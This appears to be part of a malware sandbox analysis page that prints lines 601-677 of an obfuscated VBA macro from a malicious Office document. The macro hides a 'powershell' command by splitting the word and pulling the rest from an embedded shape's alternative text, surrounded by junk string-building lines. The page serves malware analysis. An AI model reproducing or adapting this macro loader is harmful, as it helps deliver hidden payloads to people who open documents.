zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb

601

UNfjikDjKTc = Mid _

602

(Kwuqbma0i84i8, 33, 1)

603

zmlHaKIVkFA = Mid _

604

(Jvgq2zuipnof2, 168, 1)

605

UCPVYn = Mid _

606

(Ue0zfv33peubo, 10, 1)

607

EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn

608

SFwwBAcXs = Mid _

609

(Ixreu13sumwl2fh, 44, 1)

610

scjHiSYQBQp = EIjom + SFwwBAcXs

611

Nyxu3iex1m5byg0hc = "powe" + "rshe" + Sa837u25mqhc9y9f.Content.Application.ActiveDocument.InlineShapes(1@).AlternativeText$

612

Set nnnnnnnnn = Languages

613

BcfWWjIUB = Mid _

614

(Lk4lvh6ulbhr, 196, 1)

615

dYvJsnjw = Mid _

616

(A7_iiwt2cthl4n9chg, 212, 1)

617

BiHOVG = Mid _

618

(Bof0km6rvxom63lfr, 35, 1)

619

GQJzwq = Mid _

620

(Fzpjsm3wa459re7, 34, 1)

621

WKcaSvfi = Mid _

622

(Ks79z8ne9dzhmu, 9, 1)

623

lsFUF = Mid _

624

(Fqu_rp474hzmcx, 240, 1)

625

VAwYHAcv = Mid _

626

(Ejrrm5ku5klklpyu, 20, 1)

627

hNfbEKURZVE = Mid _

628

(Llxs8eo0xxc2, 179, 1)

629

wYVOV = Mid _

630

(Plrl9p27hy9, 190, 1)

631

mLdZb = Mid _

632

(Tzgerrfxq73afjecs1, 265, 1)

633

zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb

634

UNfjikDjKTc = Mid _

635

(F441a4ari4ni, 33, 1)

636

zmlHaKIVkFA = Mid _

637

(Rwfqi5ff9euzuqgz, 168, 1)

638

UCPVYn = Mid _

639

(Rorr2d9_flr_8, 10, 1)

640

EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn

641

SFwwBAcXs = Mid _

642

(Cxemudz6yvakzjarn, 44, 1)

643

scjHiSYQBQp = EIjom + SFwwBAcXs

644

Ce7y4xx8z3il = Ve1gtu0b9lgt(Nyxu3iex1m5byg0hc)

645

Set nnnnnnnnn = Languages

646

BcfWWjIUB = Mid _

647

(Biignmj6zsctsoub0b, 196, 1)

648

dYvJsnjw = Mid _

649

(Jfr1u2nau_wgb8a, 212, 1)

650

BiHOVG = Mid _

651

(Tobwn6bj8_m2pw68, 35, 1)

652

GQJzwq = Mid _

653

(Up5vsypal16d, 34, 1)

654

WKcaSvfi = Mid _

655

(Aws24y8pjtdh5, 9, 1)

656

lsFUF = Mid _

657

(Kww0fz9ishci1ww, 240, 1)

658

VAwYHAcv = Mid _

659

(Dhfv01jy4ha, 20, 1)

660

hNfbEKURZVE = Mid _

661

(O81nzebo121oo4elz, 179, 1)

662

wYVOV = Mid _

663

(Yk5ho8cjwym9f0z, 190, 1)

664

mLdZb = Mid _

665

(Rwrztwvilos, 265, 1)

666

zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb

667

UNfjikDjKTc = Mid _

668

(Efw0_hj1_ms4lqsnb, 33, 1)

669

zmlHaKIVkFA = Mid _

670

(P31jet5_bmzw8apkc, 168, 1)

671

UCPVYn = Mid _

672

(Bo99z0emdzoddh, 10, 1)

673

EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn

674

SFwwBAcXs = Mid _

675

(N32b8bcfaf8a, 44, 1)

676

scjHiSYQBQp = EIjom + SFwwBAcXs

677

End Function

678

679

Sharing

General

Malware Config

Signatures

Files

Sa837u25mqhc9y9f

Qlih9c1fe16qptome

We care about your privacy.